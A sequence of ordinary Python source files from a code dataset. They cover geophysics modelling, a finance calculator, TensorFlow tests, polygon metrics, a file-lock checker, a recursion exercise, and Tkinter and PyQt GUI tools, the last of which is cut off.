Linear forward modeling operation\n\n \"\"\"\n\n yn2, xn2, zn2 = np.meshgrid(yn[1:], xn[1:], zn[1:])\n yn1, xn1, zn1 = np.meshgrid(yn[0:-1], xn[0:-1], zn[0:-1])\n\n Yn = np.c_[Utils.mkvc(yn1), Utils.mkvc(yn2)]\n Xn = np.c_[Utils.mkvc(xn1), Utils.mkvc(xn2)]\n Zn = np.c_[Utils.mkvc(zn1), Utils.mkvc(zn2)]\n\n ndata = rxLoc.shape[0]\n\n # Pre-allocate forward matrix\n G = np.zeros((int(3*ndata), 3))\n\n for ii in range(ndata):\n\n tx, ty, tz = PF.Magnetics.get_T_mat(Xn, Yn, Zn, rxLoc[ii, :])\n\n G[ii, :] = tx / 1e-9 * mu_0\n G[ii+ndata, :] = ty / 1e-9 * mu_0\n G[ii+2*ndata, :] = tz / 1e-9 * mu_0\n\n return G\n\ndef rotationMatrix(inc, dec, normal=True):\n \"\"\"\n Take an inclination and declination angle and return a rotation matrix\n\n \"\"\"\n\n phi = -np.deg2rad(np.asarray(inc))\n theta = -np.deg2rad(np.asarray(dec))\n\n Rx = np.asarray([[1, 0, 0],\n [0, np.cos(phi), -np.sin(phi)],\n [0, np.sin(phi), np.cos(phi)]])\n\n Rz = np.asarray([[np.cos(theta), -np.sin(theta), 0],\n [np.sin(theta), np.cos(theta), 0],\n [0, 0, 1]])\n\n if normal:\n R = Rz.dot(Rx)\n else:\n R = Rx.dot(Rz)\n\n return R\n","repo_name":"domfournier/scripts","sub_path":"Simulation/PFSimulator/Mag.py","file_name":"Mag.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"33059308282","text":"import math\r\n\r\n# I have lower cased the input below, for my program to recognise all valid entries:\r\ncalculation = (input(\"\"\"Which calculations would you like to perform? \\n\\nInvestment - to calculate the amount of interest you'll earn on your investment \\nBond - to calculate the amount you'll have to pay on a home loan\\n\r\nEnter either \"investment\" or \"bond\" from the menu above to proceed: \"\"\"))\r\ncalculation = calculation.lower()\r\n\r\n# I have created a nested statement to allow the selection of \"simple\" or \"compound\" interest within the investment if statement.\r\n# I have also applied an error message below in case the user inputs anything besides \"simple\" or \"compound\".\r\nif calculation == \"investment\":\r\n amount = float(input(\"How much will you be depositing? \"))\r\n interest_rate = float(input(\"What is the interest rate? \"))\r\n interest_rate = interest_rate / 100\r\n years = float(input(\"In years, how long are you planning on investing? \"))\r\n interest_type = input(\"Would you like to opt for 'simple' or 'compound' interest? \")\r\n interest_type = interest_type.lower()\r\n if interest_type == \"simple\":\r\n simple_interest = amount * (1 + (interest_rate) * years)\r\n print(f\"The simple interest you will accumulate in addition to your investment is: £{simple_interest:.2f}\")\r\n elif interest_type == \"compound\":\r\n compound_interest = amount * math.pow((1 + interest_rate), years)\r\n print(f\"The compound interest you will accumulate in addition to your investment is: £{compound_interest:.2f}\")\r\n else:\r\n print(\"You have not entered the correct details, please enter either 'simple' or 'compound'.\")\r\n\r\n# A final error message was placed below in case all else fails as the user did not enter \"investment\" or \"bond\".\r\nelif calculation == \"bond\":\r\n house_value = float(input(\"Please enter the present value of the house: \"))\r\n interest_rate = float(input(\"What is the interest rate? \"))\r\n interest_rate = (interest_rate / 100) /12\r\n months = int(input(\"In months, how long are you planning on investing? 
\"))\r\n repayment = (interest_rate * house_value) / (1- (1 + interest_rate) ** (-1 * months))\r\n print(f\"The amount you will need to repay each month is: £{repayment:.2f}\")\r\nelse:\r\n print(\"You have entered the incorrect details, please enter either 'investment' or 'bond'.\")\r\n\r\n\r\n","repo_name":"H-756/Finance-Calculator","sub_path":"finance.calculators.py","file_name":"finance.calculators.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70674695258","text":"import numpy as np\nimport tensorflow as tf\n\nx = np.array([\n [\n [1, 1, 1, 3],\n [1, 2, 1, 1],\n [1, 1, 1, 3],\n [3, 2, 3, 1]\n ],\n [\n [1, 6, 7, 3],\n [1, 2, 1, 1],\n [1, 1, 1, 3],\n [3, 2, 3, 1]\n ]\n])\nx = tf.constant(x, dtype=tf.float32)\n\nlens = tf.constant([3, 3, 3, 2], dtype=tf.int64)\n\nmask = tf.constant([\n [\n [True, True, True, False],\n [True, True, True, False],\n [True, False, True, False],\n [False, False, False, False],\n ],\n [\n [True, True, True, False],\n [True, True, True, False],\n [True, False, True, False],\n [True, True, True, True],\n ]\n])\n\nidx = tf.where(mask)\nvals = tf.gather_nd(params=x, indices=idx)\nsparse = tf.SparseTensor(\n indices=idx,\n values=vals,\n dense_shape=tf.shape(x, out_type=tf.int64)\n)\n\nsm = tf.sparse_softmax(sparse)\n#dense = tf.sparse_tensor_to_dense(sm, default_value=0)\ndense = tf.scatter_nd(\n indices=sm.indices,\n updates=sm.values,\n shape=sm.dense_shape\n)\n\ngrad = tf.gradients(dense[0,1,2], [vals])[0]\n\nwith tf.train.MonitoredSession() as sess:\n print(sess.run(dense))\n print(np.sum(sess.run(dense), axis=-1))\n print(sess.run(grad))\n","repo_name":"bstriner/ctc-process","sub_path":"experiments/check_softmax.py","file_name":"check_softmax.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20302669182","text":"import sys\n\nimport numpy as np\n\nsys.path.append(\"../../utils\")\nimport polygon_utils\n\n\ndef compute_batch_polygon_distances(gt_polygons_batch, aligned_disp_polygons_batch):\n # Compute distances\n distances = np.sqrt(np.sum(np.square(aligned_disp_polygons_batch - gt_polygons_batch), axis=-1))\n\n min = np.nanmin(distances)\n mean = np.nanmean(distances)\n max = np.nanmax(distances)\n\n return min, mean, max\n\n\ndef compute_threshold_accuracies(gt_vertices_batch, pred_vertices_batch, thresholds):\n stripped_gt_polygons_list = []\n stripped_pred_polygons_list = []\n\n for gt_vertices, pred_vertices in zip(gt_vertices_batch, pred_vertices_batch):\n for gt_polygon, pred_polygon in zip(gt_vertices, pred_vertices):\n # Find first nan occurance\n nan_indices = np.where(np.isnan(gt_polygon[:, 0]))[0]\n if len(nan_indices):\n nan_index = nan_indices[0]\n if nan_index:\n gt_polygon = gt_polygon[:nan_index, :]\n pred_polygon = pred_polygon[:nan_index, :]\n else:\n # Empty polygon, break the for loop\n break\n gt_polygon = polygon_utils.strip_redundant_vertex(gt_polygon, epsilon=1e-3)\n pred_polygon = polygon_utils.strip_redundant_vertex(pred_polygon, epsilon=1e-3)\n stripped_gt_polygons_list.append(gt_polygon)\n stripped_pred_polygons_list.append(pred_polygon)\n\n if len(stripped_gt_polygons_list) == 0 or len(stripped_pred_polygons_list) == 0:\n return []\n\n stripped_gt_polygons = np.concatenate(stripped_gt_polygons_list)\n stripped_pred_polygons = np.concatenate(stripped_pred_polygons_list)\n\n distances = 
np.sqrt(np.sum(np.square(stripped_gt_polygons - stripped_pred_polygons), axis=-1))\n\n # Compute thresholds count\n threshold_accuracies = []\n for threshold in thresholds:\n accuracy = np.sum(distances <= threshold) / distances.size\n threshold_accuracies.append(accuracy)\n return threshold_accuracies\n\n\nif __name__ == '__main__':\n batch_size = 1\n poly_count = 3\n vertex_count = 4\n gt_vertices = np.zeros((batch_size, poly_count, vertex_count, 2))\n gt_vertices[0, 0, 0, :] = [1, 2]\n gt_vertices[0, 0, 1, :] = [3, 4]\n gt_vertices[0, 0, 2, :] = np.nan\n gt_vertices[0, 1, 0, :] = np.nan\n pred_vertices = np.zeros((batch_size, poly_count, vertex_count, 2))\n pred_vertices[0, 0, 0, :] = [1, 2]\n pred_vertices[0, 0, 1, :] = [3, 4]\n pred_vertices[0, 0, 2, :] = np.nan\n pred_vertices[0, 1, 0, :] = np.nan\n thresholds = [1, 2, 3, 4, 5, 6, 7, 8]\n\n threshold_accuracies = compute_threshold_accuracies(gt_vertices, pred_vertices, thresholds)\n print(\"threshold_accuracies = {}\".format(threshold_accuracies))\n","repo_name":"Lydorn/mapalignment","sub_path":"projects/mapalign/evaluate_funcs/evaluate_utils.py","file_name":"evaluate_utils.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"68"} +{"seq_id":"71263860378","text":"#coding: utf-8\nfrom __future__ import unicode_literals, absolute_import\n\nimport os\nimport psutil\n\n\ndef get_pids_by_name(name):\n for p in psutil.process_iter():\n if name in p.name():\n yield p\n\n\ndef dir_locked_by_process(dir, process):\n try:\n for f in process.open_files():\n if f.path.startswith(dir):\n return True\n except psutil.AccessDenied:\n pass\n return False\n\n\ndef is_locked(root_dir, src_dir, process_name):\n if root_dir == src_dir:\n return False\n\n src_dir = os.path.realpath(src_dir)\n\n for process in get_pids_by_name(process_name):\n if dir_locked_by_process(src_dir, process):\n return True\n\n src_dir = os.sep.join(src_dir.split(os.sep)[:-1])\n if root_dir != src_dir:\n return is_locked(root_dir=root_dir, src_dir=src_dir, process_name=process_name)\n\n return False\n","repo_name":"Yuego/d3-convert","sub_path":"d3_convert/utils/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74524233817","text":"# Урок 5. 
Рекурсия и алгоритмы\n# Задача 26: Напишите программу, которая на вход принимает два числа A и B, и возводит число А в целую степень B с помощью рекурсии.\n# *Пример:*\n# A = 3; B = 5 -> 243 (3⁵)\n# A = 2; B = 3 -> 8 \n\ndef recr ( B , A ):\n if B == 0:\n return 1\n return A*recr ( B-1, A)\nA = int (input (\"Введите число\"))\nB = int (input (\"В какую степень возвести\"))\nprint (recr (B,A))","repo_name":"Tyapor718/PHome5","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35246302367","text":"import tkinter as tk\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk, ImageDraw\r\nimport numpy as np\r\n\r\n\"\"\"\r\nVoici mon logiciel de dessin style packet tracer\r\nJ'ai recuperer une partie de code sur internet pour le menu bar et le canva (50 lignes environ) et j'ai fait tout le reste\r\nJ'y ai passer beaucoup de temps et je sais que je me suis beaucoup compliquer la vie mais je n'ai pas trouvé d'autre solution pour faire ce que je voulais\r\nJe suis preneur de toute critique \r\n\"\"\"\r\n\r\n# creation d’une fenêtre\r\nfen1=Tk()\r\nfen1.title('packHESS tracer')\r\ncompteur_routeur = StringVar()\r\ncompteur_routeur.set(0)\r\n\r\ncompteur_switch = StringVar()\r\ncompteur_switch.set(0)\r\n\r\ncompteur_client = StringVar()\r\ncompteur_client.set(0)\r\n\r\ncompteur_client_mobile = StringVar()\r\ncompteur_client_mobile.set(0)\r\n\r\ndef tabeffacer(): \r\n tableau.delete(ALL) # ça effacera tout ce qu'il y a dans le tableau \r\n\r\n# creation de la barre de menu\r\nmenuDraweasy = Menu(fen1) #\r\ndef info(): # affiche les coordonnées du clic gauche\r\n fenetre_prop = Toplevel()\r\n fenetre_prop.title(\"Mode D'emploi\")\r\n fenetre_prop.geometry(\"600x100\")\r\n fenetre_prop.resizable(width=False, height=False)\r\n # zone de texte\r\n zone_texte = Text(fenetre_prop, width=150, height=20)\r\n zone_texte.pack()\r\n zone_texte.insert(END, \"Bienvenue dans le mode d'emploi de l'application PackHess Tracer\\n\")\r\n zone_texte.insert(END, \"Le clic gauche sert a sélectionner et placer les items\\n\")\r\n zone_texte.insert(END, \"La ligne est tracée entre le point de clic et celui de déclic.\\n\")\r\n zone_texte.insert(END, \"La molette sert a déplacer les items et les namestags\\n\")\r\n zone_texte.insert(END, \"Le clic droit sert a affciher les propriétés\\n\")\r\n fenetre_prop.configure(bg='white')\r\n\r\ninfo()\r\n\r\n################# creation des icones #################\r\ndef img_routeur():\r\n image = Image.open(\"routeur.png\")\r\n image = image.resize((50, 50))\r\n image_routeur = ImageTk.PhotoImage(image)\r\n return image_routeur\r\nimage_routeur = img_routeur()\r\n\r\ndef img_line():\r\n image = Image.open(\"line.png\")\r\n image = image.resize((50, 50))\r\n image_line = ImageTk.PhotoImage(image)\r\n return image_line\r\nimage_line = img_line()\r\n\r\ndef img_switch():\r\n image = Image.open(\"switch.jpg\")\r\n image = image.resize((50, 50))\r\n image_switch = ImageTk.PhotoImage(image)\r\n return image_switch\r\nimage_switch = img_switch()\r\n\r\ndef image_cli_pc():\r\n image = Image.open(\"pc.png\")\r\n image = image.resize((50, 50))\r\n image_client_pc = ImageTk.PhotoImage(image)\r\n return image_client_pc\r\nimage_client_pc = image_cli_pc()\r\n\r\ndef image_suppr():\r\n image = Image.open(\"1214428.png\")\r\n image = image.resize((50, 50))\r\n image_supp = ImageTk.PhotoImage(image)\r\n return image_supp\r\nimage_supp = 
image_suppr()\r\n\r\ndef image_client_mobile():\r\n image = Image.open(\"mobile.png\")\r\n image = image.resize((50, 50))\r\n image_mobile = ImageTk.PhotoImage(image)\r\n return image_mobile\r\nimage_mobile = image_client_mobile()\r\n####################################################### A partir d'ici c'est recuperer sur internet puis adapter a mon besoin ############################################################\r\n# Jy comprennais strictement rien et ca m'a pas mal aider sauf les boutons fait dans dans des boucles ca m'a pas mal compliquer la vie \r\n#####################################################################\r\n#pris sur internet\r\n# creation du menu fichier\r\nfichier = Menu(menuDraweasy)\r\nmenuDraweasy.add_cascade(label=\"Fichier\",menu=fichier) # on crée une barre de menu\r\nfichier.add_command(label=\"Quitter\", command=fen1.destroy) # on ajoute une option au menu\r\n# creation du menu effacer\r\neffacer = Menu(menuDraweasy)\r\nmenuDraweasy.add_cascade(label=\"Effacer\",menu=effacer)\r\neffacer.add_command(label=\"Effacer tout\", command=lambda : tabeffacer()) \r\n# afficher le menu\r\nfen1.config(menu=menuDraweasy)\r\n# creation des differents cadres\r\nTableau=LabelFrame(fen1)\r\nTableau.configure(text='',bd=2,relief='flat')\r\nTableau.grid(row=0,rowspan=3,column=2,padx=0,pady=0)\r\nCouleur=LabelFrame(fen1)\r\nCouleur.configure(text='Couleur du trait',font='Courier 10',bd=2,relief='flat')\r\nCouleur.grid(row=0,column=1,padx=0,pady=0,sticky=W)\r\nStyle=LabelFrame(fen1)\r\nStyle.configure(text='Style de forme',font='Courier 10',bd=2,relief='flat')\r\nStyle.grid(row=1,column=1,padx=0,pady=0,sticky=W)\r\nEpaisseur=LabelFrame(fen1)\r\nEpaisseur.configure(text='Epaisseur du trait',font='Courier 10',bd=2,relief='flat')\r\nEpaisseur.grid(row=2,column=1,padx=0,pady=0,sticky=W)\r\n# creation des boutons du cadre Tableau\r\ntableau=Canvas(Tableau)\r\ntableau.focus_set()\r\ntableau.configure(width=800,height=700,bg='white')\r\ntableau.grid()\r\n#creation variable item selectionner\r\nstyle=StringVar()\r\nstyle.set(0) # 0 = routeur, 1 = switch, 2 = client, 3 = ligne, 4 = suppr\r\n# adaptation du code trouvé sur internet\r\n# j'ai eu la flemme de changer les variables au debut mais mtn elles sont partout ca va etre trop long de toutes les changer...\r\n# creation des boutons de choix d'item\r\ncouleur=IntVar()\r\ncouleur.set(0)\r\npalette=[image_routeur,image_switch,image_client_pc,image_mobile , image_line, image_supp]\r\nobjet=['routeur', 'switch', 'client pc','client mobile', 'ligne', 'gomme' ]\r\nrcouleur={}\r\n#######################################################\r\n # creation des boutons du cadre Epaisseur\r\nepaisseur=IntVar() \r\nepaisseur.set(1)\r\nrepaisseur={}\r\nfor e in range(1,5):\r\n repaisseur[e]=Radiobutton(Epaisseur)\r\n repaisseur[e].configure(variable=epaisseur,value=e,text=str(e),indicatoron=1)\r\n repaisseur[e].grid(sticky=N, padx=5)\r\n#######################################################\r\n####################################################### A partir d'ici c'est de nouevau a moi ############################################################\r\netatboutonsouris='haut'# etat du bouton gauche de la souris au début\r\n#######################################################\r\ndef declic_suppr(event): # supprime l'item selectionner\r\n global etatboutonsouris,X2,Y2\r\n etatboutonsouris='haut'\r\n X2=event.x\r\n Y2=event.y\r\n item = tableau.find_closest(X2,Y2)\r\n tableau.delete(item)\r\n 
print(\"done\")\r\n#######################################################\r\n palette=[image_routeur,image_switch,image_client_pc,image_mobile , image_line, image_supp]\r\n#######################################################\r\ndef choix_style_menubar(): # selon l'item selectionner, on bind la fonction associée\r\n if tableau.find_closest(X1, Y1) != (): # si on ne clique pas sur rien\r\n if tableau.find_closest(X1, Y1) == (rcouleur[0]):\r\n style.set(0)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[1]):\r\n style.set(1)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[2]):\r\n style.set(2)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[3]):\r\n style.set(3)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[4]):\r\n style.set(4)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[5]):\r\n style.set(5)\r\n print('its me')\r\n tableau.bind('',declic_suppr)\r\n else: # si jamais on clique sur rien\r\n tableau.bind('',declic)\r\n ligne_selected = ['true','first clic done']\r\n#######################################################\r\n#######################################################\r\ndef clic_en_fonction_de_style(): # si autre que suppr, lacher clic gauche = declic, sinon clic gauche = declic_suppr\r\n if str(style.get()) == '0':\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '1':\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '2':\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '3': \r\n tableau.bind('',declic)\r\n elif str(style.get() )== '4': # si suppr\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '5':\r\n tableau.bind('',declic_suppr)\r\n else: \r\n print(f\"erreur style.get() = {style.get()}\")\r\n#######################################################\r\n####################################################### # evenement associe au clic sur le tableau\r\ndef clic(event): # creation d'un objet \"event\" lorsque l'on appuie sur le tableau\r\n global etatboutonsouris,X1,Y1, ligne_selected # X1 et Y1 sont les attributs qui contiennent les coordonnées au moment du clic\r\n if str(style.get()) == \"3\":\r\n ligne_selected = 'true'\r\n etatboutonsouris='bas' \r\n X1=event.x\r\n Y1=event.y\r\n choix_style_menubar() # si jamais clic sur un item du menu\r\n clic_en_fonction_de_style()\r\n#######################################################\r\n#### creation des boutons de choix d'item\r\nfor c in range(0,6):\r\n rcouleur[c]=Radiobutton(Couleur)\r\n rcouleur[c].config(image=palette[c])\r\n rcouleur[c].configure(variable=style,value=str(c),padx=8,indicatoron=1, width=50, height=50, command=lambda : print(f\"style.get : {style.get()} et item : {objet[int(style.get())]}\"))\r\n rcouleur[c].grid(sticky=W, padx=5)\r\nstyle.set(0) # valeur par defaut car sinon selectionne tout\r\n# move image with mouse \r\ndef clicM(event): #lors du clic sur la molette on recupere les coordonées\r\n global etatboutonsouris,XM,YM\r\n etatboutonsouris='bas'\r\n XM=event.x\r\n YM=event.y\r\n\r\ndef releaseM(event): # lors du relachement de la molette on recupere les coordonées\r\n global etatboutonsouris,XMR,YMR\r\n XMR=event.x\r\n YMR=event.y\r\n etatboutonsouris='haut'\r\n if etatboutonsouris =='haut': # ici on déplace l'objet au coordonées du relachement de la molette\r\n item = tableau.find_closest(XM,YM)\r\n tableau.move(item,XMR-XM,YMR-YM)\r\n \r\ntableau.bind('',releaseM) # on associe le relachement de la molette à 
la fonction releaseM\r\ntableau.bind('', clicM) # on associe le clic de la molette à la fonction clicM\r\n\r\ndef declic(event):# evenements associe au declic sur le tableau\r\n global etatboutonsouris,X2,Y2\r\n etatboutonsouris='haut'\r\n X2=event.x\r\n Y2=event.y\r\n # declic basique si un choix a etait fait dans le menu\r\n if (style.get()==\"0\"): # si a choisi routeur\r\n icon = tableau.create_image(X1,Y1,anchor=NW,image=image_routeur, tags=('routeur'+str(compteur_routeur.get())))\r\n tableau.create_text(X1+24,Y1+60, text=tableau.gettags(icon), tags='texte')\r\n c = int(compteur_routeur.get()); c = c+1; compteur_routeur.set(c)\r\n elif (style.get()==\"1\"): # si a choisi switch\r\n icon1 = tableau.create_image(X1,Y1,anchor=NW,image=image_switch, tags=('switch'+str(compteur_switch.get())))\r\n tableau.create_text(X1+20,Y1+20, text=tableau.gettags(icon1), tags='texte')\r\n c = int(compteur_switch.get()); c = c+1; compteur_switch.set(c)\r\n elif (style.get()==\"2\"): # si a choisi pc\r\n icon2 = tableau.create_image(X1,Y1,anchor=NW,image=image_client_pc, tags=('client'+str(compteur_client.get())))\r\n tableau.create_text(X1+20,Y1+20, text=tableau.gettags(icon2), tags='texte')\r\n c = int(compteur_client.get()); c = c+1; compteur_client.set(c)\r\n elif (style.get()==\"3\"): # si a choisi mobile\r\n icon3 = tableau.create_image(X1,Y1,anchor=NW,image=image_mobile, tags=('mobile'+str(compteur_client_mobile.get())))\r\n tableau.create_text(X1+20,Y1+20, text=tableau.gettags(icon3), tags='texte')\r\n c = int(compteur_client_mobile.get()); c = c+1; compteur_client_mobile.set(c)\r\n elif (style.get() == \"4\"): # si a choisi ligne\r\n tableau.create_line(X1,Y1,X2,Y2,fill='black',width=epaisseur.get(), tags=('ligne'))\r\ntableau.bind('',clic) # clic gauche = clic\r\n\r\n################## partie modification et infos ############################\r\n'''\r\ndef test():\r\n items_nom.append(str(string_nom.get()))\r\n items_ip.append(str(string_ip.get()))\r\n items_mac.append(str(string_mac.get()))\r\n items_mdp.append(str(string_mdp.get()))\r\n \r\n print(f\"nom : {items_nom} ip : {items_ip} mac : {items_mac} mdp : {items_mdp}\")\r\n'''\r\n\r\nglobal items_nom\r\nitems_nom = {}\r\n#\r\nglobal string_nom\r\nstring_nom = StringVar()\r\n\r\nglobal items_ip\r\nitems_ip = {}\r\n#\r\nglobal string_ip\r\nstring_ip = StringVar()\r\n# \r\nglobal items_mac\r\nitems_mac = {}\r\n#\r\nglobal string_mac\r\nstring_mac = StringVar()\r\n#\r\nglobal items_mdp\r\nitems_mdp = {}\r\n#\r\nglobal string_mdp\r\nstring_mdp = StringVar()\r\n\r\ndef adding_to_dict():\r\n item = tableau.find_closest(localX, localY)\r\n name = tableau.gettags(item)[0] + str(item)[1:2]\r\n items_nom[name] = str(name)\r\n items_nom[name] = str(string_ip.get())\r\n items_nom[name] = str(string_mac.get())\r\n items_nom[name] = str(string_mdp.get())\r\n print(f\"dico : items_nom : {items_nom}\")\r\n print(f\"nom : {items_nom} ip : {items_ip} mac : {items_mac} mdp : {items_mdp}\")\r\n \r\ndef window_propriété(event):\r\n# fenetre de propriété\r\n fenetre_prop = Toplevel()\r\n fenetre_prop.title(\"Propriétés propriétés\")\r\n fenetre_prop.geometry(\"400x400\")\r\n fenetre_prop.resizable(width=False, height=False)\r\n fenetre_prop.configure(bg='white')\r\n# formulaire texte\r\n # champs entree texte\r\n item = tableau.find_closest(event.x, event.y)\r\n name = tableau.gettags(item)[0] + str(item)[1:2]\r\n #for i in range(tableau.find_all())\r\n label_nom = Label(fenetre_prop, text='nom').pack()\r\n entry_nom = Entry(fenetre_prop, 
textvariable=string_nom).pack()\r\n # champs entree texte\r\n label_ip = Label(fenetre_prop, text='ip').pack()\r\n entry_ip = Entry(fenetre_prop, textvariable=string_ip).pack()\r\n # champs entree texte\r\n label_mac = Label(fenetre_prop, text='mac').pack()\r\n entry_mac = Entry(fenetre_prop, textvariable=string_mac).pack()\r\n # champs entree texte\r\n label_mdp = Label(fenetre_prop, text='mdp').pack()\r\n entry_mdp = Entry(fenetre_prop, textvariable=string_mdp).pack()\r\n # Bouton valider\r\n bouton_valider = Button(fenetre_prop, text='Valider', command=adding_to_dict).pack()\r\n fenetre_prop.mainloop()\r\n return fenetre_prop\r\n\r\ndef proprietes(event):\r\n global localX\r\n localX = event.x\r\n global localY\r\n localY = event.y\r\n ### create a new small window when clicking on the image\r\n if tableau.find_closest(event.x, event.y, halo=1) != ():\r\n item = tableau.find_closest(event.x, event.y)\r\n name = tableau.gettags(item)[0] + str(item)[1:2]\r\n print(name)\r\n print('item = ', item)\r\n fenetre_prop = window_propriété(event)\r\n tableau.bind('',window_propriété)\r\n #fenetre_prop.grab_set()\r\n fenetre_prop.focus_set()\r\n fenetre_prop.wait_window()\r\n fenetre_prop.mainloop()\r\ntableau.bind('',proprietes) # clic droit = proprietes\r\n# attente des evenements\r\nfen1.mainloop() # démarre l'observateur d'évènements\r\n\r\n\r\n\r\n\r\n","repo_name":"IUT-Beziers/r309-tp2-PaulBerra","sub_path":"test3r.py","file_name":"test3r.py","file_ext":"py","file_size_in_byte":15417,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40327760911","text":"import sys\n\nsys.path.append(\"..\")\nfrom Math import projection\nfrom ProjectionMatrix.vtk_window_pm import vtk_window_pm\nimport numpy as np\nfrom ProjectionMatrix.vtk_proj_matrix import vtk_proj_matrix\nfrom PyQt5 import QtWidgets\n\nfrom ProjectionMatrix.ProjMatCreator import Ui_projectionMatrixCreator\n\n\nclass ProjMatCreator_logic(Ui_projectionMatrixCreator):\n def __init__(self, widget):\n Ui_projectionMatrixCreator.__init__(self)\n ##set up the UI\n self.setupUi(widget)\n self.init_variables()\n self.connect_sliders()\n self.connect_textfields()\n self.connect_buttons()\n self.vtk_handle = vtk_window_pm()\n self.vtk_handle.vtkWidget(self.View3D)\n self.create_tajectory()\n\n def connect_buttons(self):\n self.bt_reset.clicked.connect(self.on_reset_all_values)\n\n def init_variables(self):\n self.initial_values = [200, 0, 100, 1200, 750, 1240, 960, 0.305, 0.305, 8, 0, 0, 1]\n self.current_values = self.initial_values.copy()\n self.pm_actor_list = []\n self.pm = []\n self.last_density = self.current_values[9]\n\n def on_update_matrices(self):\n self.pm_actor_list = []\n self.pm = []\n\n start = self.current_values[1]\n stop = self.current_values[2]\n num_proj = max(self.current_values[0], 1)\n delta_ang = (stop - start) / num_proj\n axis = np.matrix([self.current_values[-3], self.current_values[-2], self.current_values[-1]])\n\n offset_u = self.current_values[5] / 2\n offset_v = self.current_values[6] / 2\n\n sid = self.current_values[3]\n sisod = self.current_values[4]\n px_sp = self.current_values[7]\n default_pm = projection.create_default_projection_matrix(pixel_spacing=px_sp,\n sid=sid, sisod=sisod, offset_u=offset_u,\n offset_v=offset_v)\n\n for i in range(int(self.current_values[0])):\n rot = projection.get_rotation_matrix_by_axis_and_angle(axis.T, start + delta_ang * i,\n make_matrix_homogen=True)\n pm = default_pm * rot\n self.pm.append(pm)\n 
self.pm_actor_list.append(vtk_proj_matrix(pm, sid, offset_u * 2, offset_v * 2))\n\n def connect_sliders(self):\n ##connect sliders\n self.sl_num_proj.valueChanged.connect(lambda x: self.tf_num_proj.setText(str(x)))\n self.sl_proj_sparsity.valueChanged.connect(lambda x: self.tf_proj_sparsity.setText(str(x)))\n self.sl_start_angle.valueChanged.connect(lambda x: self.tf_start_angle.setText(str(x)))\n self.sl_stop_angle.valueChanged.connect(lambda x: self.tf_stop_angle.setText(str(x)))\n self.sl_SID.valueChanged.connect(lambda x: self.tf_SID.setText(str(x)))\n self.sl_SISOD.valueChanged.connect(lambda x: self.tf_SISOD.setText(str(x)))\n self.sl_size_U.valueChanged.connect(lambda x: self.tf_size_U.setText(str(x)))\n self.sl_size_V.valueChanged.connect(lambda x: self.tf_size_V.setText(str(x)))\n\n def connect_textfields(self):\n self.tf_num_proj.textChanged.connect(lambda x: self.on_proj_para_changed(x, 0))\n self.tf_proj_sparsity.textChanged.connect(lambda x: self.on_proj_para_changed(x, 9))\n self.tf_start_angle.textChanged.connect(lambda x: self.on_proj_para_changed(x, 1))\n self.tf_stop_angle.textChanged.connect(lambda x: self.on_proj_para_changed(x, 2))\n self.tf_SID.textChanged.connect(lambda x: self.on_proj_para_changed(x, 3))\n self.tf_SISOD.textChanged.connect(lambda x: self.on_proj_para_changed(x, 4))\n self.tf_size_U.textChanged.connect(lambda x: self.on_proj_para_changed(x, 5))\n self.tf_size_V.textChanged.connect(lambda x: self.on_proj_para_changed(x, 6))\n self.tf_px_U.textChanged.connect(lambda x: self.on_proj_para_changed(x, 7))\n self.tf_px_V.textChanged.connect(lambda x: self.on_proj_para_changed(x, 8))\n\n ###sync textbox with sliders\n self.tf_num_proj.textChanged.connect(lambda x: self.sl_num_proj.setSliderPosition(int(x)))\n self.tf_proj_sparsity.textChanged.connect(lambda x: self.sl_proj_sparsity.setSliderPosition(int(x)))\n self.tf_start_angle.textChanged.connect(lambda x: self.sl_start_angle.setSliderPosition(int(x)))\n self.tf_stop_angle.textChanged.connect(lambda x: self.sl_stop_angle.setSliderPosition(int(x)))\n self.tf_SID.textChanged.connect(lambda x: self.sl_SID.setSliderPosition(int(x)))\n self.tf_SISOD.textChanged.connect(lambda x: self.sl_SISOD.setSliderPosition(int(x)))\n self.tf_size_U.textChanged.connect(lambda x: self.sl_size_U.setSliderPosition(int(x)))\n self.tf_size_V.textChanged.connect(lambda x: self.sl_size_V.setSliderPosition(int(x)))\n\n def disable_slider_connections(self, boolean):\n self.sl_num_proj.blockSignals(boolean)\n self.sl_start_angle.blockSignals(boolean)\n self.sl_stop_angle.blockSignals(boolean)\n self.sl_SID.blockSignals(boolean)\n self.sl_SISOD.blockSignals(boolean)\n self.sl_size_U.blockSignals(boolean)\n self.sl_size_V.blockSignals(boolean)\n\n def on_proj_para_changed(self, value, identifier):\n cur_para = self.current_values\n create_trajectory = self.create_tajectory\n cur_para[identifier] = float(value)\n create_trajectory()\n\n def on_set_projection_values(self, value, identifier):\n if identifier == 0:\n self.tf_num_proj.setText(str(value))\n self.sl_num_proj.setSliderPosition(int(value))\n elif identifier == 1:\n self.tf_start_angle.setText(str(value))\n self.sl_start_angle.setSliderPosition(int(value))\n elif 